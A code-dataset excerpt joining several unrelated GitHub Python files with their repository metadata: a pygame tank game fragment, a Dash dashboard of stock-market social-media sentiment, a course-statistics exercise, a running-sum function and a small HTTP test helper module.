QtxtRect = screen.get_rect(center=(SCREENWIDTH+SCREENWIDTH-900,SCREENHEIGHT+SCREENHEIGHT-420))
screen.blit(Qtxt, QtxtRect)
angle = font.render("ANGLE "+str(player.alpha), True, 'black','white')
angleRect = screen.get_rect(center=(SCREENWIDTH//2+20,SCREENHEIGHT+SCREENHEIGHT-550))
screen.blit(angle, angleRect)
power = font.render("POWER "+str(player.V0), True, 'black','white')
powerRect = screen.get_rect(center=(SCREENWIDTH//2+20,SCREENHEIGHT+SCREENHEIGHT-500))
screen.blit(power, powerRect)
scoreText = font.render("SCORE "+str(player.score), True, 'black','white')
scoreRect = screen.get_rect(center=(SCREENWIDTH//2+20,SCREENHEIGHT+SCREENHEIGHT-450))
screen.blit(scoreText, scoreRect)
def helpMenu(self):
pUD = pygame.image.load('images/powerUPpowerDown.png').convert_alpha()
pUD = pygame.transform.scale(pUD, (260,130))
screen.blit(pUD, (0,SCREENHEIGHT*0.1))
font = pygame.font.Font('fonts/TitleFont.ttf', 30)
ptext = font.render("POWER +1 ", True, 'black','white')
ptextRect = screen.get_rect(center=(SCREENWIDTH-530,SCREENHEIGHT-268))
screen.blit(ptext, ptextRect)
ptext2 = font.render("POWER -1 ", True, 'black','white')
ptextRect2 = screen.get_rect(center=(SCREENWIDTH-530,SCREENHEIGHT-213))
screen.blit(ptext2, ptextRect2)
wasd = pygame.image.load('images/WASD.png').convert_alpha()
wasd = pygame.transform.scale(wasd, (260,130))
screen.blit(wasd, (30,SCREENHEIGHT*0.2+50))
WASDT1 = font.render("W,S- ANGLE", True, 'black','white')
ptextRect = screen.get_rect(center=(SCREENWIDTH-450,SCREENHEIGHT-140))
screen.blit(WASDT1, ptextRect)
WASDT2 = font.render("A,D- MOVE", True, 'black','white')
ptextRect = screen.get_rect(center=(SCREENWIDTH-450,SCREENHEIGHT-90))
screen.blit(WASDT2, ptextRect)
#class variables
player = Player(50, SCREENHEIGHT*0.6,0,9.81,10,0,0.01,False,0,0,0)
gui = gameGUI(0,SCREENHEIGHT-200)
target= Target(0, 0)
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
#Controls
KEYS = pygame.key.get_pressed()
if(KEYS[pygame.K_ESCAPE]):
running=False
if(KEYS[pygame.K_q]):
showHelp= not showHelp
if(KEYS[pygame.K_e]):
isStartingScreen=False
if(KEYS[pygame.K_SPACE]):
player.isShoted = True
if(player.isShoted==False):
if(KEYS[pygame.K_UP]):
player.V0 +=1
if(KEYS[pygame.K_DOWN]):
player.V0 -=1
if(player.V0<=10):
player.V0=10
if(player.V0>=50):
player.V0=50
#GAME section
if(isStartingScreen==True):
start_Screen()
else:
screen.fill('white')
gui.draw()
target.spawnTarget()
target.drawTarget()
if(player.score/10==checkVar and player.score!=0):
x_target.clear()
y_target.clear()
target.spawnTarget()
target.drawTarget()
checkVar+=1
if(showHelp==True):
gui.helpMenu()
player.checkColl()
player.draw()
player.move()
player.tankTurret()
player.wallCollision()
if(player.isShoted):
player.shoot()
player.t+=0.2
#pygame essentials
pygame.display.flip()
dt = clock.tick(FPS) / 1000
pygame.quit()
|
stefanstojkoviic/Tenkici
|
game.py
|
game.py
|
py
| 8,210 |
python
|
en
|
code
| 0 |
github-code
|
6
|
72136709947
|
#Plots
import re
import plotly.express as px
#DASHBOARD
import dash
import dash_html_components as html
import dash_core_components as dcc
from dash.dependencies import Input, Output
import dash_bootstrap_components as dbc
import dash_table
from dash.exceptions import PreventUpdate
import tweepy
##########
from data import *
from update_db import *
from graphs import *
from semanticsearch import get_similar_sentences
app = dash.Dash(__name__, external_stylesheets=[dbc.themes.BOOTSTRAP])
server = app.server # for Heroku deployment
tabs_styles = {
# 'height': '44px',
'background': '#393939'
}
tab_style = {
'borderBottom': '1px solid #d6d6d6',
'padding': '6px',
'fontWeight': 'bold'
}
tab_selected_style = {
'borderTop': '1px solid #d6d6d6',
'borderBottom': '1px solid #d6d6d6',
'backgroundColor': '#119DFF',
'color': 'white',
'padding': '6px'
}
################################ DATA PROCESSING #########################################
stockprice_number_of_days = '8d'
stocks_screenerview = pd.read_csv('socialmediadata/stocks_screenerview_sectors.csv')
consumer_key = ""
consumer_secret = ""
access_token = "326146455-"
access_token_secret = ""
# Creating the authentication object
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
# Setting your access token and secret
auth.set_access_token(access_token, access_token_secret)
# Creating the API object by passing in auth information
api = tweepy.API(auth)
def top_words_on_key(df, colum_name, Source, key, keytype, top_n):
df_words = " ".join(df[colum_name]).split(' ')
if key == '@':
df_ticker_list = re.findall(r'[@][A-Za-z]+', str(df_words))
elif key == '#':
df_ticker_list = re.findall(r'[#][A-Za-z]+', str(df_words))
else:
df_ticker_list = re.findall(r'[$][A-Za-z]+', str(df_words))
# print(df_ticker_list)
df_top_tickers = pd.Series(df_ticker_list).value_counts()[:top_n].to_frame('count').reset_index()
df_top_tickers['Source'] = Source
df_top_tickers['keytype'] = keytype
# print(df_top_tickers)
return df_top_tickers
LEFT_COLUMN = dbc.Navbar(
[
dbc.Row(
[
dbc.Col(html.H4(" Stock Market Insights"),md=6),
html.Br(),
dbc.Col(
html.Label(" Stock Ticker:"),md=2),
dbc.Col(
dcc.Dropdown(id='dropdown',options=[
{'label': 'Microsoft (MSFT)', 'value': 'MSFT'},
{'label': 'Tesla (TSLA)', 'value': 'TSLA'},
{'label': 'TMobile (TMUS)', 'value': 'TMUS'}],value='TMUS',clearable=False
),md=4)
]
)
]
)
def homepage_stockmarket_fig():
namedent_agg_sorted = stocks_screenerview.groupby(['Sector']).apply(
lambda x: x.sort_values(['Volume'], ascending=False)).reset_index(
drop=True)
namedent_agg_top5_df = namedent_agg_sorted.groupby(['Sector']).head(5)
namedent_agg_top5_df['Ticker_Company'] = namedent_agg_top5_df['Ticker'] + '(' + namedent_agg_top5_df[
'Company'] + ')'
stockvolume_sunburst_fig = px.sunburst(namedent_agg_top5_df, path=['Sector', 'Ticker'], values='Volume',
hover_name="Ticker_Company",color_discrete_sequence=px.colors.qualitative.Pastel)
stockvolume_sunburst_fig.update_layout(
title=dict(text="<b>Top Tickers based on <br> Actual Stock Volume</b>"),
plot_bgcolor='#5B5959',
font=dict(size=13)
)
tweet_df = get_data_from_db( db_table_name = 'socialmediadata.stock_twitterdata')
reddit_df = get_data_from_db(db_table_name='socialmediadata.stock_redditdata')
reddit_top_tickers = top_words_on_key(reddit_df, 'text', 'Reddit', '$', 'Tickers', 5)
twitter_top_tickers = top_words_on_key(tweet_df, 'text', 'Twitter', '$', 'Tickers', 5)
top_social_media = pd.concat([reddit_top_tickers, twitter_top_tickers])
top_tickers_socialmedia_sunburstfig = px.sunburst(top_social_media, path=['Source','index'],
values='count',color_discrete_sequence=px.colors.qualitative.Pastel)
top_tickers_socialmedia_sunburstfig.update_layout(
title=dict(text="<b>Top Tickers based on <br> Volume(No Of Tweets) on Social Media</b>"),
#treemapcolorway=['#0000A0', '#E6A000', '#009FEB'],
plot_bgcolor='#5B5959',
font=dict(size=12)
)
df_top_reddit_users = pd.Series(reddit_df['user']).value_counts()[:5].to_frame('count').reset_index()
df_top_reddit_users['Source']='Reddit'
df_top_twitter_users = pd.Series(tweet_df['user']).value_counts()[:5].to_frame('count').reset_index()
df_top_twitter_users['Source'] = 'Twitter'
top_social_users = pd.concat([df_top_reddit_users, df_top_twitter_users])
top_users_socialmedia_sunburstfig = px.bar(top_social_users, x='count', y='index', color="Source", barmode='group')
top_users_socialmedia_sunburstfig.update_layout(
title=dict(text="<b>Top Users on Social Media</b>"),
# treemapcolorway=['#0000A0', '#E6A000', '#009FEB'],
plot_bgcolor='#5B5959',
font=dict(size=12)
)
final_namedentitydf = pd.read_csv('socialmediadata/namedentitydf.csv')
socialmedia_namedentity_fig = px.treemap(final_namedentitydf, path=['source', 'Label', 'Text'],
color_discrete_sequence=px.colors.qualitative.Pastel,values='count')
socialmedia_namedentity_fig.update_layout(
title=dict(text="<b>Stock News Named Entities from Twitter,Reddit,News and Blogs </b>"),
#treemapcolorway=['#0000A0', '#E6A000', '#009FEB'],
font=dict(size=14)
)
return stockvolume_sunburst_fig,top_tickers_socialmedia_sunburstfig,socialmedia_namedentity_fig,top_users_socialmedia_sunburstfig
stockvolume_sunburst_fig,top_tickers_socialmedia_sunburstfig,\
socialmedia_namedentity_fig,top_users_socialmedia_sunburstfig = homepage_stockmarket_fig()
HOME_BODY = [
dbc.Row(
[
dbc.Col(dcc.Graph(id="stockvolume_sunburst_fig",figure=stockvolume_sunburst_fig),width=4),
dbc.Col(dcc.Graph(id="top_tickers_socialmedia_sunburstfig",figure=top_tickers_socialmedia_sunburstfig),width=4),
dbc.Col(dcc.Graph(id="top_users_socialmedia_sunburstfig",figure=top_users_socialmedia_sunburstfig),width=4)
]
),
dbc.Row(
[
dbc.Col(dcc.Graph(id="socialmedia_namedentity_fig", figure=socialmedia_namedentity_fig), width=12)
]
),
html.Br(),
dbc.Col(html.H2("Semantic Search on Twitter,Reddit,News and Blogs"),md=11),
html.Br(),
dbc.Row(
[
dbc.Col(dbc.Card(dcc.Input(id='semantic_search', type="text", value="Stock news related to Healthcare Sector", placeholder="Twitter Search")),
md=8)
]),
dbc.Row(
[
dbc.Col(dbc.Card(html.Label(id='semanticsearchtable')), width=11)
]),
html.Br(),
dbc.Col(html.H2("Real Time Twitter Streaming Insights"),md=11),
html.Br(),
dbc.Row(
[
dbc.Col(dcc.Input(id='twitter_search',type="text", value="stockmarket",placeholder="Twitter Search"), md=8)
]),
html.Br(),
dcc.Interval(
id='interval-component',
interval=1 * 80000, # in milliseconds
n_intervals=0
),
dbc.Row(
[
dbc.Col(dbc.Card(html.Label(id='tweettable')), width=7)
])
]
SOCIALMEDIA_BODY = [
html.Br(),
dbc.Row(
[
dbc.Col(dbc.Card(html.Div(id='stockdescription')), width=12)
],
),
dbc.Row(
[
#dbc.Col(dcc.Graph(id="tophashtagmentionfunnelchart"),width=3),
dbc.Col(dbc.Spinner(dcc.Graph(id="tickertopmentionssunburstplot"), type = "grow"),width=4),
dbc.Col(dbc.Spinner(dcc.Graph(id="stockfundchart"), type = "grow"),width=7)
],
),
dbc.Row(
[
dbc.Col(dbc.Spinner(dcc.Graph(id="stockchart"), type="grow"), width=11)
],
),
dbc.Row(
[
dbc.Col(dbc.Spinner(dcc.Graph(id="stocksentimentlinechart"), type = "grow"),width=11)
],
),
dbc.Row(
[
dbc.Col(dbc.Spinner(dcc.Graph(id="stocksentimentfunnelallchart"), type="grow"),width=4),
dbc.Col(dbc.Spinner(dcc.Graph(id="stocksentimentfunnelchart"), type="grow"),width=8)
],
),
dbc.Row(
[
dbc.Col(dcc.RangeSlider(id='sentiment-slider',min=-1,max=1,step=0.2,value=[0, 0.5]),width=4),
],
),
dbc.Row(
[
dbc.Col(
[
dbc.Row(dbc.Spinner(dcc.Graph(id="twitterwordcloudplot"),type = "grow")),
dbc.Row(dbc.Spinner(dcc.Graph(id="redditwordcloudplot"),type = "grow"))
],width=3
),
dbc.Col(dbc.Card(html.Label(id='sentimenttable')), width=7)
]
),
dbc.Col(html.H2("Real Time Tweets from STOCKTWITS"),md=11),
dbc.Col(dbc.Spinner(html.Label(id='stocktwits-output'),type = "grow"), width=11)
]
NEWS_BODY = [
dbc.Col(dbc.Spinner(dbc.Card(html.Label(id='newsarticletable'))), width=11),
dbc.Row(
[
dbc.Col(dbc.Spinner(dcc.Graph(id="newsngramfig")),width=4),
dbc.Col(dbc.Spinner(dcc.Graph(id="newswordcloudfig")), width=4)
],
),
dbc.Col(dbc.Spinner(dbc.Card(dcc.Graph(id='newsnamedentity'))),width=11)
]
BODY = dbc.Container\
([
dbc.Row(
dbc.Col(
dcc.Tabs(id="tabs-styled-with-inline", value='home',
children=[
dcc.Tab(label='HOME', value='home',style=tab_style, selected_style=tab_selected_style),
dcc.Tab(label='TICKER-SOCIALMEDIA SENTIMENTS', value='socialmedia',style=tab_style, selected_style=tab_selected_style),
dcc.Tab(label='TICKER-NEWS ', value='news',style=tab_style, selected_style=tab_selected_style),
]
),width={"size": 8, "offset": 2},md={"size": 10, "offset": 1},lg={"size": 12, "offset": 0}
),className="bottom32"),
#html.Div(dcc.Loading(html.Div(id="main_div"),type="cube", style={"marginTop": "150px"}),style={"minHeight": "500px"})
html.Div(html.Div(id="main_div"))
], style={"maxWidth": "1340px"}
)
app.layout = html.Div(children=[LEFT_COLUMN,BODY])
###########################################################################################
##########################################CALLBACKS########################################
###########################################################################################
@app.callback([Output('stockdescription', 'children'),
Output('stockfundchart', 'figure'),
Output('stockchart', 'figure')
],
Input('dropdown', 'value')
)
def update_graphs(value):
#####
stockdescription, stock_fundament = get_stock_fundamentals(value)
stock_fund_treefig = px.treemap(stock_fundament, path=['index', 'value'], color_discrete_sequence = px.colors.qualitative.Pastel,height=400)
data = get_stockpricedata(value, stockprice_number_of_days)
stock_fig = candlestick_chart(data)
return stockdescription, stock_fund_treefig,stock_fig
@app.callback(
Output('tickertopmentionssunburstplot', 'figure'),
Input('dropdown', 'value')
)
def update_graphs(value):
#####
tweet_df = get_data_from_db(db_table_name='socialmediadata.ticker_twitterdata1')
reddit_df = get_data_from_db(db_table_name='socialmediadata.ticker_redditdata')
tweet_df = tweet_df[tweet_df['ticker'] == '$'+value]
reddit_df = reddit_df[reddit_df['ticker'] == value]
tweet_df['DataSource'] = 'Twitter'
reddit_df['DataSource'] = 'Reddit'
reddit_top_mentions = top_words_on_key(reddit_df, 'text', 'Reddit', '@', 'Mentions', 5)
reddit_top_hashtags = top_words_on_key(reddit_df, 'text', 'Reddit', '#', 'Hashtags', 5)
twitter_top_mentions = top_words_on_key(tweet_df, 'text', 'Twitter', '@', 'Mentions', 5)
twitter_top_hashtags = top_words_on_key(tweet_df, 'text', 'Twitter', '#', 'Hashtags', 5)
top_social_media = pd.concat(
[reddit_top_mentions, reddit_top_hashtags, twitter_top_mentions, twitter_top_hashtags])
top_mentions_hastags_sunburstfig = px.sunburst(top_social_media, path=['keytype', 'Source', 'index'],
values='count',color_discrete_sequence=px.colors.qualitative.Pastel)
top_mentions_hastags_sunburstfig.update_layout(
plot_bgcolor='#5B5959',
title=dict(text="<b>Top Mentions/Hashtags on Social Media</b>"),
font=dict(size=11)
)
return top_mentions_hastags_sunburstfig
@app.callback(
Output('stocksentimentlinechart', 'figure')
,
Input('dropdown', 'value')
)
def update_graphs(value):
#####
tweet_df = get_data_from_db(db_table_name='socialmediadata.ticker_twitterdata1')
reddit_df = get_data_from_db(db_table_name='socialmediadata.ticker_redditdata')
tweet_df = tweet_df[tweet_df['ticker'] == '$'+ value]
reddit_df = reddit_df[reddit_df['ticker'] == value]
tweet_df['DataSource'] = 'Twitter'
reddit_df['DataSource'] = 'Reddit'
twitter_reddit_sentiment_df = pd.concat([tweet_df, reddit_df])
twitter_reddit_sentiment_df['datehour'] = pd.to_datetime(
twitter_reddit_sentiment_df.date_hour.dt.strftime("%m/%d/%Y, %H"))
twitter_reddit_sentiment_df['Date'] = pd.to_datetime(twitter_reddit_sentiment_df.date_hour.dt.strftime("%m/%d/%Y"))
finaldf = twitter_reddit_sentiment_df.groupby(['datehour', 'DataSource'])['sentiment_score'].mean().reset_index()
stock_sentiment_line_fig = update_sentiment_linechart(finaldf, x='datehour', y='sentiment_score',
color='DataSource')
return stock_sentiment_line_fig
@app.callback([
Output('stocksentimentfunnelallchart', 'figure'),
Output('stocksentimentfunnelchart', 'figure')
],
Input('dropdown', 'value')
)
def update_graphs(value):
#####
tweet_df = get_data_from_db(db_table_name='socialmediadata.ticker_twitterdata1')
reddit_df = get_data_from_db(db_table_name='socialmediadata.ticker_redditdata')
tweet_df = tweet_df[tweet_df['ticker'] == '$'+value]
reddit_df = reddit_df[reddit_df['ticker'] == value]
tweet_df['DataSource'] = 'Twitter'
reddit_df['DataSource'] = 'Reddit'
twitter_reddit_sentiment_df = pd.concat([tweet_df, reddit_df])
twitter_reddit_sentiment_df['datehour'] = pd.to_datetime(
twitter_reddit_sentiment_df.date_hour.dt.strftime("%m/%d/%Y, %H"))
twitter_reddit_sentiment_df['Date'] = pd.to_datetime(twitter_reddit_sentiment_df.date_hour.dt.strftime("%m/%d/%Y"))
finaldf_date = twitter_reddit_sentiment_df.groupby(['Date', 'DataSource', 'sentiment']).size().reset_index()
final__ = finaldf_date.sort_values(0, ascending=False)
stock_sentiment_funnel_all_fig = px.bar(final__, x=0, y='sentiment', color="DataSource")
#stock_sentiment_funnel_all_fig.update_layout(showlegend=False)
finaldf_ = twitter_reddit_sentiment_df.groupby(['datehour', 'DataSource', 'sentiment']).size().reset_index()
finaldf_2 = finaldf_[finaldf_['sentiment'] != "Neutral"]
stock_sentiment_funnel_fig = update_stock_sentiment_funnel(finaldf_2, x="datehour", y=0, text="DataSource",
color="sentiment")
return stock_sentiment_funnel_all_fig,stock_sentiment_funnel_fig
@app.callback([
Output('sentimenttable', 'children'),
Output('redditwordcloudplot', 'figure'),
Output('twitterwordcloudplot', 'figure')
],
Input('dropdown', 'value')
)
def update_graphs(value):
tweetdf = get_data_from_db( db_table_name = 'socialmediadata.ticker_twitterdata1')
redditdf = get_data_from_db(db_table_name='socialmediadata.ticker_redditdata')
tweet_df = tweetdf[tweetdf['ticker'] == '$'+value]
reddit_df = redditdf[redditdf['ticker'] == value]
tweet_df['DataSource'] = 'Twitter'
reddit_df['DataSource'] = 'Reddit'
twitter_reddit_sentiment_df = pd.concat([tweet_df, reddit_df])
nlpinsight = nlpinsights(reddit_df, column_name="text")
reddit_wordcloud_fig = nlpinsight.visualize_wordclouds()
nlpinsight = nlpinsights(tweet_df, column_name="text")
twitter_wordcloud_fig = nlpinsight.visualize_wordclouds()
twitter_reddit_sentiment_df['datehour'] = pd.to_datetime(
twitter_reddit_sentiment_df.date_hour.dt.strftime("%m/%d/%Y, %H"))
twitter_reddit_sentiment_df['Date'] = pd.to_datetime(twitter_reddit_sentiment_df.date_hour.dt.strftime("%m/%d/%Y"))
print(twitter_reddit_sentiment_df.columns)
twitter_reddit_sentiment_fil = twitter_reddit_sentiment_df[['date_hour', 'text', 'sentiment_score','DataSource','url']]
twitter_reddit_sentiment_fil = twitter_reddit_sentiment_fil.round(3)
def f(row):
l = "[{0}]({0})".format(row["url"])
return l
print(twitter_reddit_sentiment_fil.head(2))
twitter_reddit_sentiment_fil["url"] = twitter_reddit_sentiment_fil.apply(f, axis=1)
#twitter_reddit_sentiment_fil = twitter_reddit_sentiment_fil[
# (twitter_reddit_sentiment_fil['sentiment_score'] > int(slidervalue[0])) & (
# twitter_reddit_sentiment_fil['sentiment_score'] < int(slidervalue[1]))]
sentiments_table = dash_table.DataTable(
id='datatable-output1',
style_data={
'whiteSpace': 'normal',
# 'height': 'auto'
},
data=twitter_reddit_sentiment_fil.to_dict('records'),
row_selectable="multi",
selected_rows=[],
columns=[{'id': c, 'name': c ,'type':'text', 'presentation':'markdown'} for c in twitter_reddit_sentiment_fil.columns],
# columns=[{'name': 'Link', 'id': 'Link', 'type': 'text', 'presentation': 'markdown'}],
filter_action='native',
sort_action='native',
css=[
{'selector': '.row-1', 'rule': 'background: #E6A000;'}
],
page_size=4,
style_header={'backgroundColor': '#7DF180', 'fontWeight': 'bold', 'border': '1px solid black',
'font_size': '18px'},
style_cell={'font_size': '11px', 'whiteSpace': 'normal',
'height': 'auto', 'padding': '15px'},
# export_format='csv',
export_format='csv',
style_cell_conditional=[
{'if': {'column_id': 'date_hour'},
'width': '10%',
'textAlign': 'left'},
{'if': {'column_id': 'sentiment_score'},
'width': '5%',
'textAlign': 'left'},
{'if': {'column_id': 'text'},
'width': '65%',
'textAlign': 'left'},
{'if': {'column_id': 'DataSource'},
'width': '10%',
'textAlign': 'left'},
{'if': {'column_id': 'url'},
'width': '10%',
'textAlign': 'left'}
]
)
#top_mentions_hastags_sunburstfig
return sentiments_table,reddit_wordcloud_fig,twitter_wordcloud_fig
@app.callback(
Output('newsngramfig', 'figure'),
Output('newswordcloudfig', 'figure'),
Input('dropdown', 'value')
)
def update_graphs(value):
news_df = get_data_from_db(db_table_name='socialmediadata.ticker_newsdata')
news_df = news_df[news_df['ticker'] == value]
news_df = news_df.round(3)
news_df = news_df.head(15)
nlpinsight = nlpinsights(news_df, column_name="text")
news_wordcloud_fig = nlpinsight.visualize_wordclouds()
news_ngram_fig = nlpinsight.visualize_ngrams(2,5)
return news_ngram_fig,news_wordcloud_fig
@app.callback(
Output('newsnamedentity', 'figure'),
Input('dropdown', 'value')
)
def update_graphs(value):
news_df = get_data_from_db(db_table_name='socialmediadata.ticker_newsdata')
news_df = news_df[news_df['ticker'] == value]
news_df = news_df.round(3)
news_df = news_df.head(5)
nlpinsight = nlpinsights(news_df, column_name="text")
news_namedentity_fig = nlpinsight.visualize_namedentities()
return news_namedentity_fig
@app.callback(Output('newsarticletable', 'children'),
Input('dropdown', 'value')
)
def update_graphs(value):
news_df = get_data_from_db(db_table_name='socialmediadata.ticker_newsdata')
news_df = news_df[news_df['ticker'] == value]
news_df = news_df.round(3)
#newsarticle_df = news_df[news_df['ticker'] == value]
newsarticle_df = news_df[['date','title','summary','sentiment_score','link']]
newsarticle_df = newsarticle_df[newsarticle_df['summary']!='Invalid']
#print(newsarticle_df)
def f(row):
l = "[{0}]({0})".format(row["link"])
return l
newsarticle_df["link"] = newsarticle_df.apply(f, axis=1)
newsarticle_table = dash_table.DataTable(
id='datatable-output1',
style_data={
'whiteSpace': 'normal',
# 'height': 'auto'
},
data=newsarticle_df.to_dict('records'),
row_selectable="multi",
selected_rows=[],
columns=[{'id': c, 'name': c ,'type':'text', 'presentation':'markdown'} for c in newsarticle_df.columns],
# columns=[{'name': 'Link', 'id': 'Link', 'type': 'text', 'presentation': 'markdown'}],
filter_action='native',
sort_action='native',
css=[
{'selector': '.row-1', 'rule': 'background: #E6A000;'}
],
page_size=4,
style_header={'backgroundColor': '#7DF180', 'fontWeight': 'bold', 'border': '1px solid black',
'font_size': '18px'},
style_cell={'font_size': '11px', 'whiteSpace': 'normal',
'height': 'auto', 'padding': '15px'},
# export_format='csv',
export_format='csv',
style_cell_conditional=[
{'if': {'column_id': 'Date'},
'width': '15%',
'textAlign': 'left'},
{'if': {'column_id': 'Title'},
'width': '20%',
'textAlign': 'left'},
{'if': {'column_id': 'Link'},
'width': '10%',
'textAlign': 'left'},
{'if': {'column_id': 'summary'},
'width': '45%',
'textAlign': 'left'},
{'if': {'column_id': 'sentiment_score'},
'width': '10%',
'textAlign': 'left'},
{'if': {'column_id': 'sentiment'},
'width': '5%',
'textAlign': 'left'}
]
)
return newsarticle_table
@app.callback(Output('tweettable', 'children'),
[Input('twitter_search', 'value'),
Input('interval-component', 'n_intervals')]
)
def update_graphs(value,n):
mainlis = []
res = api.search(value)
for i in res:
lis = []
lis.append([i.id, i.created_at, i.text])
mainlis.append(lis)
tweetstream_df = pd.DataFrame(mainlis)
tweetstream_table = dash_table.DataTable(
id='datatable-output',
style_data={
'whiteSpace': 'normal',
'height': 'auto',
'lineHeight': '15px'
},
data=tweetstream_df.to_dict('records'),
css=[
{'selector': '.row-1', 'rule': 'background: #E6A000;'}
],
columns=[{'id': c, 'name': c} for c in tweetstream_df.columns],
page_size=8,
style_header={'backgroundColor': '#E6A000', 'fontWeight': 'bold', 'border': '1px solid black',
'font_size': '18px'},
style_cell={'font_size': '11px', 'font_family': "Arial", 'whiteSpace': 'normal',
'height': 'auto', 'padding': '15px'
},
# export_format='csv',
export_format='csv',
export_headers='display',
style_data_conditional=[
{
'if': {'row_index': 'odd'},
'backgroundColor': 'rgb(248, 248, 248)'
}
],
style_cell_conditional=[
{'if': {'column_id': 'UserTweetDate'},
'width': '10%',
'textAlign': 'center'},
{'if': {'column_id': 'Time'},
'width': '10%',
'textAlign': 'center'},
{'if': {'column_id': 'Tweet'},
'width': '55%',
'textAlign': 'left'},
{'if': {'column_id': 'sentiment'},
'width': '15%',
'textAlign': 'left'},
]
)
return tweetstream_table
@app.callback(Output('semanticsearchtable', 'children')
,
Input('semantic_search', 'value')
)
def update_graphs(value):
stock_socialmediasemanticdata = get_data_from_db(db_table_name='socialmediadata.stock_socialmediasemanticdata')
semantic_df = get_similar_sentences(stock_socialmediasemanticdata,[value])
def f(row):
l = "[{0}]({0})".format(row["link"])
return l
semantic_df["link"] = semantic_df.apply(f, axis=1)
print("Semantic Searchhh")
print(semantic_df.head())
tweetstream_table = dash_table.DataTable(
id='datatable-output1',
style_data={
'whiteSpace': 'normal',
# 'height': 'auto'
},
data=semantic_df.to_dict('records'),
columns=[{'id': c, 'name': c, 'type': 'text', 'presentation': 'markdown'} for c in semantic_df.columns],
# columns=[{'name': 'Link', 'id': 'Link', 'type': 'text', 'presentation': 'markdown'}],
#filter_action='native',
sort_action='native',
css=[
{'selector': '.row-1', 'rule': 'background: #E6A000;'}
],
page_size=4,
style_header={'backgroundColor': '#E6A000', 'fontWeight': 'bold', 'border': '1px solid black',
'font_size': '18px'},
style_cell={'font_size': '11px', 'whiteSpace': 'normal',
'height': 'auto', 'padding': '15px'},
# export_format='csv',
export_format='csv'
)
return tweetstream_table
@app.callback(Output('stocktwits-output', 'children'),
[Input('dropdown', 'value')])
def get_data_table2(option):
df2 = getstocktwitsdata(option)
#print('---STOCKTWITS---')
#print(df2)
df = df2[['date','time','text','sentiment']]
df.columns = ['UserTweetDate', 'Time', 'Tweet', 'sentiment']
filtereddf = df.copy()
filteredtable = dash_table.DataTable(
id='datatable-output',
style_data={
'whiteSpace': 'normal',
'height': 'auto',
'lineHeight': '15px'
},
data=filtereddf.to_dict('records'),
css=[
{ 'selector': '.row-1', 'rule': 'background: #E6A000;' }
],
columns=[{'id': c, 'name': c} for c in filtereddf.columns],
page_size=8,
style_header={'backgroundColor': '#E6A000', 'fontWeight': 'bold', 'border': '1px solid black',
'font_size': '18px'},
style_cell={'font_size': '11px', 'font_family':"Arial",'whiteSpace': 'normal',
'height': 'auto', 'padding': '15px'
},
#export_format='csv',
export_format='csv',
export_headers='display',
style_data_conditional=[
{
'if': {'row_index': 'odd'},
'backgroundColor': 'rgb(248, 248, 248)'
}
],
style_cell_conditional=[
{'if': {'column_id': 'UserTweetDate'},
'width': '10%',
'textAlign': 'center'},
{'if': {'column_id': 'Time'},
'width': '10%',
'textAlign': 'center'},
{'if': {'column_id': 'Tweet'},
'width': '55%',
'textAlign': 'left'},
{'if': {'column_id': 'sentiment'},
'width': '15%',
'textAlign': 'left'},
]
)
return filteredtable
@app.callback(
Output('main_div', 'children'),
[Input('tabs-styled-with-inline', 'value')])
def update_graph(tab_btn):
if tab_btn == "socialmedia":
return SOCIALMEDIA_BODY
elif tab_btn == "home":
return HOME_BODY
elif tab_btn == "news":
return NEWS_BODY
if __name__ == "__main__":
app.run_server(port = 8053)
|
balasubramaniamniit/StockMarket-Insights
|
app.py
|
app.py
|
py
| 30,384 |
python
|
en
|
code
| 0 |
github-code
|
6
|
26345492918
|
class Technology:
def __init__(self, language, course_name, participants):
self.language = language
self.course_name = course_name
self.participants = participants
self.course = {self.course_name: int(self.participants)}
self.total_participants = int(participants)
def add_course(self, course_name, participants):
if course_name not in self.course:
self.course.update({course_name: int(participants)})
else:
self.course[course_name] = self.course[course_name] + \
int(participants)
self.total_participants += int(participants)
def __str__(self):
return f"language - {self.language} / total_participants - {self.total_participants} / course - {self.course}"
data = input()
objects = []
while data != 'end':
data = data.split(' - ')
language = data[0]
courses = data[1]
courses = courses.split(", ")
for item in courses:
course_name = item.split(":")[0]
participants = item.split(":")[1]
if language not in [x.language for x in objects]:
obj = Technology(language, course_name, participants)
objects.append(obj)
else:
for i in objects:
if i.language == language:
i.add_course(course_name, participants)
data = input()
tech_sort = sorted(objects, key=lambda x: -x.total_participants)
print(f"Most popular: {tech_sort[0].language} ({tech_sort[0].total_participants} participants)")
print(f"Least popular: {tech_sort[-1].language} ({tech_sort[-1].total_participants} participants)")
for index, elem in enumerate(tech_sort):
print(f"{tech_sort[index].language} \
({tech_sort[index].total_participants} participants):")
course_sort = sorted(elem.course.items(), key=lambda x: -x[1])
for item in course_sort:
print(f"--{item[0]} -> {item[1]}")
|
YovchoGandjurov/Python-Fundamentals
|
Exam Preparation/04.Course_Stats.py
|
04.Course_Stats.py
|
py
| 1,962 |
python
|
en
|
code
| 1 |
github-code
|
6
|
39176120423
|
array = [1,2,3,4]
array2 = [1,1,1,1,1]
def runningSum(array):
sum = 0
new_array = []
for i in range(0 , len(array)):
sum = sum + array[i]
new_array.append(sum)
return new_array
print(runningSum(array2))
|
adnantabda/Competitive-Programming
|
easy/running_sum_of_1D_array.py
|
running_sum_of_1D_array.py
|
py
| 238 |
python
|
en
|
code
| 0 |
github-code
|
6
|
6428337601
|
#! /user/bin/env python
# -*- coding:utf-8 -*-
from python_http_runner.src.common.utils import get_data_from_yml
from python_http_runner.src.common.utils import get_url
def common_get(*args):
data = {
"env": "TEST",
"key1": "value1",
"key2": "value2",
"url": ""
}
file = "../common/config.yml"
content = get_data_from_yml(file)
data["env"] = content["env"]
data["key1"] = content["key1"]
data["key2"] = content["key2"]
data["url"] = get_url()
value = ""
if str(args[0]) in data.keys():
value = data.get(str(args[0]))
return value
def feature1_get(*args):
data = {
"key1": "key1",
"key2": "key2",
}
value = ""
if str(args[0]) in data.keys():
value = data.get(str(args[0]))
return value
def feature2_get(*args):
data = {
"key1": "key1",
"key2": "key2",
}
value = ""
if str(args[0]) in data.keys():
value = data.get(str(args[0]))
return value
|
liuxu263/PythonHttpRunner
|
python_http_runner/src/testsuites/debugtalk.py
|
debugtalk.py
|
py
| 1,019 |
python
|
en
|
code
| 0 |
github-code
|
6
|
16731268894
|
from abc import ABC, ABCMeta, abstractmethod
from datetime import datetime
from pprint import pprint
from typing import Dict
try:
